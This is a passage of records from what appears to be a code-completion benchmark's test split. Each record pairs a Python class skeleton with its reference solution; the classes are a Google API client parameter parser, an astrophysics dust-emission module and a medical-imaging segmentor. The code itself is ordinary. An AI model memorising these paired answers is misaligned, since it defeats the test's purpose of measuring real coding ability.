"prompted_full_text": "Implement the Python class `ResourceMethodParameters` described below.\n\nClass description:\nRepresents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\n\nMethod signatures and docstrings:\n- def __init__(self, method_desc): Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\n- def set_parameters(self, method_desc): Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\n\n<|skeleton|>\nclass ResourceMethodParameters:\n \"\"\"Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. 
path_params: Set of parameters (represented by parameter name as str\"\"\"\n\n def __init__(self, method_desc):\n \"\"\"Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_0|>\n\n def set_parameters(self, method_desc):\n \"\"\"Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.argmap = {}\n self.required_params = []\n self.repeated_params = []\n self.pattern_params = {}\n self.query_params = []\n self.path_params = set()\n self.param_types = {}\n self.enum_params = {}\n self.set_parameters(method_desc)\n<|end_body_0|>\n\n<|body_start_1|>\n for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\n for match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)\n<|end_body_1|>\n", "revision_id": "975a95032ce5b7012d1772c7f1f5cfe606eae839", "skeleton": "<|skeleton|>\nclass ResourceMethodParameters:\n \"\"\"Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\"\"\"\n\n def __init__(self, method_desc):\n \"\"\"Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_0|>\n\n def set_parameters(self, method_desc):\n \"\"\"Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. 
Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ResourceMethodParameters:\n \"\"\"Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\"\"\"\n\n def __init__(self, method_desc):\n \"\"\"Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n self.argmap = {}\n self.required_params = []\n self.repeated_params = []\n self.pattern_params = {}\n self.query_params = []\n self.path_params = set()\n self.param_types = {}\n self.enum_params = {}\n self.set_parameters(method_desc)\n\n def set_parameters(self, method_desc):\n \"\"\"Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. 
Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\n for match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)\n", "source": "the_stack_v2_python_sparse", "source_path": "courses/machine_learning/deepdive2/structured/solutions/serving/application/lib/googleapiclient/discovery.py", "source_repo": "GoogleCloudPlatform/training-data-analyst", "split": "test", "star_events_count": 7311} {"blob_id": "8865dfe158b150b0a67e9939b9d6180d4c4a3997", "bodies": ["self.epsilon = float(self.parameters['epsilon_mbb'])\nself.T = float(self.parameters['t_mbb'])\nself.beta = float(self.parameters['beta_mbb'])\nself.energy_balance = bool(self.parameters['energy_balance'])\nif self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\nc = cst.c * 1000000000.0\nlambda_0 = 200000.0\nself.wave = np.logspace(3.0, 6.0, 1000.0)\nconv = c / (self.wave * self.wave)\nself.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\nnorm = np.trapz(self.lumin_mbb, x=self.wave)\nself.lumin_mbb /= norm", "if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\nluminosity = sed.info['dust.luminosity']\nsed.add_module(self.name, self.parameters)\nsed.add_info('dust.t_mbb', self.T)\nsed.add_info('dust.beta_mbb', self.beta)\nsed.add_info('dust.epsilon_mbb', self.epsilon)\nif self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\nsed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)"], "bodies_text": "<|body_start_0|>\n self.epsilon = float(self.parameters['epsilon_mbb'])\n self.T = float(self.parameters['t_mbb'])\n self.beta = float(self.parameters['beta_mbb'])\n self.energy_balance = bool(self.parameters['energy_balance'])\n if self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\n c = cst.c * 1000000000.0\n lambda_0 = 200000.0\n self.wave = np.logspace(3.0, 6.0, 1000.0)\n conv = c / (self.wave * self.wave)\n self.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\n norm = np.trapz(self.lumin_mbb, x=self.wave)\n self.lumin_mbb /= norm\n<|end_body_0|>\n\n<|body_start_1|>\n if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\n luminosity = 
sed.info['dust.luminosity']\n sed.add_module(self.name, self.parameters)\n sed.add_info('dust.t_mbb', self.T)\n sed.add_info('dust.beta_mbb', self.beta)\n sed.add_info('dust.epsilon_mbb', self.epsilon)\n if self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\n sed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)\n<|end_body_1|>\n", "class_docstring": "One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..", "class_name": "MBB", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MBB:\n \"\"\"One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\"\"\"\n\n def _init_code(self):\n \"\"\"Build the model for a given set of parameters.\"\"\"\n <|body_0|>\n\n def process(self, sed):\n \"\"\"Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.epsilon = float(self.parameters['epsilon_mbb'])\n self.T = float(self.parameters['t_mbb'])\n self.beta = float(self.parameters['beta_mbb'])\n self.energy_balance = bool(self.parameters['energy_balance'])\n if self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\n c = cst.c * 1000000000.0\n lambda_0 = 200000.0\n self.wave = np.logspace(3.0, 6.0, 1000.0)\n conv = c / (self.wave * self.wave)\n self.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\n norm = np.trapz(self.lumin_mbb, x=self.wave)\n self.lumin_mbb /= norm\n<|end_body_0|>\n\n<|body_start_1|>\n if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\n luminosity = sed.info['dust.luminosity']\n sed.add_module(self.name, self.parameters)\n sed.add_info('dust.t_mbb', self.T)\n sed.add_info('dust.beta_mbb', self.beta)\n sed.add_info('dust.epsilon_mbb', self.epsilon)\n if self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\n sed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000405", "length_bytes": 4961, "license_type": "no_license", "methods": [{"docstring": "Build the model for a given set of parameters.", "name": "_init_code", "signature": "def _init_code(self)"}, {"docstring": "Add the IR re-emission contributions. 
Parameters ---------- sed: pcigale.sed.SED object", "name": "process", "signature": "def process(self, sed)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005543", "prompt": "Implement the Python class `MBB` described below.\n\nClass description:\nOne modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\n\nMethod signatures and docstrings:\n- def _init_code(self): Build the model for a given set of parameters.\n- def process(self, sed): Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object", "prompted_full_text": "Implement the Python class `MBB` described below.\n\nClass description:\nOne modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\n\nMethod signatures and docstrings:\n- def _init_code(self): Build the model for a given set of parameters.\n- def process(self, sed): Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object\n\n<|skeleton|>\nclass MBB:\n \"\"\"One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\"\"\"\n\n def _init_code(self):\n \"\"\"Build the model for a given set of parameters.\"\"\"\n <|body_0|>\n\n def process(self, sed):\n \"\"\"Add the IR re-emission contributions. 
Parameters ---------- sed: pcigale.sed.SED object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.epsilon = float(self.parameters['epsilon_mbb'])\n self.T = float(self.parameters['t_mbb'])\n self.beta = float(self.parameters['beta_mbb'])\n self.energy_balance = bool(self.parameters['energy_balance'])\n if self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\n c = cst.c * 1000000000.0\n lambda_0 = 200000.0\n self.wave = np.logspace(3.0, 6.0, 1000.0)\n conv = c / (self.wave * self.wave)\n self.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\n norm = np.trapz(self.lumin_mbb, x=self.wave)\n self.lumin_mbb /= norm\n<|end_body_0|>\n\n<|body_start_1|>\n if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\n luminosity = sed.info['dust.luminosity']\n sed.add_module(self.name, self.parameters)\n sed.add_info('dust.t_mbb', self.T)\n sed.add_info('dust.beta_mbb', self.beta)\n sed.add_info('dust.epsilon_mbb', self.epsilon)\n if self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\n sed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)\n<|end_body_1|>\n", "revision_id": "9ef9b99425537350b8706fddfe90ed47301107a5", "skeleton": "<|skeleton|>\nclass MBB:\n \"\"\"One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\"\"\"\n\n def _init_code(self):\n \"\"\"Build the model for a given set of parameters.\"\"\"\n <|body_0|>\n\n def process(self, sed):\n \"\"\"Add the IR re-emission contributions. Parameters ---------- sed: pcigale.sed.SED object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MBB:\n \"\"\"One modified black body IR re-emission Given an amount of attenuation (e.g. resulting from the action of a dust attenuation module) this module normalises MBB plus any previous IR contribution to this amount of energy. The final SED allows to keep the energy balance or not..\"\"\"\n\n def _init_code(self):\n \"\"\"Build the model for a given set of parameters.\"\"\"\n self.epsilon = float(self.parameters['epsilon_mbb'])\n self.T = float(self.parameters['t_mbb'])\n self.beta = float(self.parameters['beta_mbb'])\n self.energy_balance = bool(self.parameters['energy_balance'])\n if self.epsilon < 0.0:\n raise Exception('Error, epsilon_mbb must be ≥ 0.')\n c = cst.c * 1000000000.0\n lambda_0 = 200000.0\n self.wave = np.logspace(3.0, 6.0, 1000.0)\n conv = c / (self.wave * self.wave)\n self.lumin_mbb = conv * (1.0 - np.exp(-(lambda_0 / self.wave) ** self.beta)) * (c / self.wave) ** 3.0 / (np.exp(cst.h * c / (self.wave * cst.k * self.T)) - 1.0)\n norm = np.trapz(self.lumin_mbb, x=self.wave)\n self.lumin_mbb /= norm\n\n def process(self, sed):\n \"\"\"Add the IR re-emission contributions. 
Parameters ---------- sed: pcigale.sed.SED object\"\"\"\n if 'dust.luminosity' not in sed.info:\n sed.add_info('dust.luminosity', 1.0, True)\n luminosity = sed.info['dust.luminosity']\n sed.add_module(self.name, self.parameters)\n sed.add_info('dust.t_mbb', self.T)\n sed.add_info('dust.beta_mbb', self.beta)\n sed.add_info('dust.epsilon_mbb', self.epsilon)\n if self.energy_balance:\n other_dust_contributions = [contrib for contrib in sed.contribution_names if 'dust' in contrib]\n for item in other_dust_contributions:\n item_balance = item + '_balance'\n lumin = sed.get_lumin_contribution(item)\n wavelength = sed.wavelength_grid\n sed.add_info(item_balance, 1.0, True)\n sed.add_contribution(item_balance, wavelength, -lumin * self.epsilon)\n sed.add_contribution('dust.mbb', self.wave, luminosity * self.epsilon * self.lumin_mbb)\n", "source": "the_stack_v2_python_sparse", "source_path": "pcigale/sed_modules/mbb.py", "source_repo": "JohannesBuchner/cigale", "split": "test", "star_events_count": 5} {"blob_id": "b70e73edb101e6303b655e31f58aa1ebc22cac70", "bodies": ["super(Segmentor, self).__init__(parameters)\nself.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\nself.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\nself.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\nself.layers = nn.ModuleList(self.layer_list)\nself.apply(self.weight_init)\nnn.init.xavier_normal_(self.conv.weight.data)\nself.conv.bias.data.zero_()", "for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()", "for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\nx = F.softmax(self.conv(x), dim=1)\nreturn x"], "bodies_text": "<|body_start_0|>\n super(Segmentor, self).__init__(parameters)\n self.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\n self.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\n self.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\n self.layers = nn.ModuleList(self.layer_list)\n self.apply(self.weight_init)\n nn.init.xavier_normal_(self.conv.weight.data)\n self.conv.bias.data.zero_()\n<|end_body_0|>\n\n<|body_start_1|>\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n<|end_body_1|>\n\n<|body_start_2|>\n for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\n x = F.softmax(self.conv(x), dim=1)\n return x\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Segmentor", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Segmentor:\n\n def __init__(self, parameters, anatomy_factors):\n \"\"\"Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. 
conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\"\"\"\n <|body_0|>\n\n def weight_init(model):\n \"\"\"Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\"\"\"\n <|body_1|>\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Segmentor, self).__init__(parameters)\n self.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\n self.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\n self.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\n self.layers = nn.ModuleList(self.layer_list)\n self.apply(self.weight_init)\n nn.init.xavier_normal_(self.conv.weight.data)\n self.conv.bias.data.zero_()\n<|end_body_0|>\n\n<|body_start_1|>\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n<|end_body_1|>\n\n<|body_start_2|>\n for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\n x = F.softmax(self.conv(x), dim=1)\n return x\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000406", "length_bytes": 14834, "license_type": "permissive", "methods": [{"docstring": "Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.", "name": "__init__", "signature": "def __init__(self, parameters, anatomy_factors)"}, {"docstring": "Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.", "name": "weight_init", "signature": "def weight_init(model)"}, {"docstring": "Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.", "name": "forward", "signature": "def forward(self, x: torch.Tensor) -> torch.Tensor"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006697", "prompt": "Implement the Python class `Segmentor` described below.\n\nClass description:\nImplement the Segmentor class.\n\nMethod signatures and docstrings:\n- def __init__(self, parameters, anatomy_factors): Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\n- def weight_init(model): Initialize weights for the given model using He (Kaiming) initialization. 
Args: model (nn.Module): Model for which the weights will be initialized.\n- def forward(self, x: torch.Tensor) -> torch.Tensor: Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.", "prompted_full_text": "Implement the Python class `Segmentor` described below.\n\nClass description:\nImplement the Segmentor class.\n\nMethod signatures and docstrings:\n- def __init__(self, parameters, anatomy_factors): Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\n- def weight_init(model): Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\n- def forward(self, x: torch.Tensor) -> torch.Tensor: Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.\n\n<|skeleton|>\nclass Segmentor:\n\n def __init__(self, parameters, anatomy_factors):\n \"\"\"Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\"\"\"\n <|body_0|>\n\n def weight_init(model):\n \"\"\"Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\"\"\"\n <|body_1|>\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Segmentor, self).__init__(parameters)\n self.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\n self.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\n self.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\n self.layers = nn.ModuleList(self.layer_list)\n self.apply(self.weight_init)\n nn.init.xavier_normal_(self.conv.weight.data)\n self.conv.bias.data.zero_()\n<|end_body_0|>\n\n<|body_start_1|>\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n<|end_body_1|>\n\n<|body_start_2|>\n for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\n x = F.softmax(self.conv(x), dim=1)\n return x\n<|end_body_2|>\n", "revision_id": "72eb99f68205afd5f8d49a3bb6cfc08cfd467582", "skeleton": "<|skeleton|>\nclass Segmentor:\n\n def __init__(self, parameters, anatomy_factors):\n \"\"\"Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. 
Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\"\"\"\n <|body_0|>\n\n def weight_init(model):\n \"\"\"Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\"\"\"\n <|body_1|>\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Segmentor:\n def __init__(self, parameters, anatomy_factors):\n \"\"\"Segmentor module for SDNet. Args: parameters (dict): A dictionary containing model parameters. anatomy_factors (int): The number of anatomical factors to be considered. Attributes: layer_list (list): List of layers in the Segmentor module. conv (nn.Conv2d): Convolutional layer to generate the final output. layers (nn.ModuleList): List of layers in the Segmentor module.\"\"\"\n super(Segmentor, self).__init__(parameters)\n self.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\n self.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\n self.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\n self.layers = nn.ModuleList(self.layer_list)\n self.apply(self.weight_init)\n nn.init.xavier_normal_(self.conv.weight.data)\n self.conv.bias.data.zero_()\n\n def weight_init(model):\n \"\"\"Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\"\"\"\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). 
Returns: torch.Tensor: Segmentation map output tensor.\"\"\"\n for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\n x = F.softmax(self.conv(x), dim=1)\n return x\n", "source": "the_stack_v2_python_sparse", "source_path": "GANDLF/models/sdnet.py", "source_repo": "mlcommons/GaNDLF", "split": "test", "star_events_count": 45} {"blob_id": "4c4cdde8d51657a733b6cadd0cbfae3f28cff9db", "bodies": ["path = os.path.join(settings.data_path, settings.DATA['file_name'])\ntest_data = read_test_data.ReadExcel().read_sheet(path, sheet)\nreturn test_data", "log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\nlogger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\nreturn logger"], "bodies_text": "<|body_start_0|>\n path = os.path.join(settings.data_path, settings.DATA['file_name'])\n test_data = read_test_data.ReadExcel().read_sheet(path, sheet)\n return test_data\n<|end_body_0|>\n\n<|body_start_1|>\n log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\n logger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\n return logger\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MiddleHandler", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MiddleHandler:\n\n def get_test_data(self, sheet):\n \"\"\"读取data.xlsx的结果\"\"\"\n <|body_0|>\n\n def log_init(self):\n \"\"\"log初始化\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n path = 